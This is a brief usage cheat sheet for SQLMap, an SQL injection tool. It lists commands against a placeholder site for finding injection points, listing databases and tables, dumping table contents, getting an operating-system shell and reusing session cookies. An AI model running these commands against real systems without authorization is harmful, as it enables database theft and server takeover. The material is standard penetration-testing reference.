SQLMap
Automated SQL injection and database takeover tool.
SQLMap: Automated SQL Injection
SQLMap is an open-source tool that automates the detection and exploitation of SQL injection flaws.
Usage
```bash
# Basic test
sqlmap -u "https://example.com/page?id=1"

# POST request
sqlmap -u "https://example.com/login" --data="user=admin&pass=test"

# List databases
sqlmap -u "https://example.com/page?id=1" --dbs

# List tables
sqlmap -u "https://example.com/page?id=1" -D database_name --tables

# Dump table
sqlmap -u "https://example.com/page?id=1" -D database_name -T table_name --dump

# OS Shell
sqlmap -u "https://example.com/page?id=1" --os-shell

# Using cookies
sqlmap -u "https://example.com/page?id=1" --cookie="PHPSESSID=abc123"

# Risk and Level
sqlmap -u "https://example.com/page?id=1" --risk=3 --level=5
```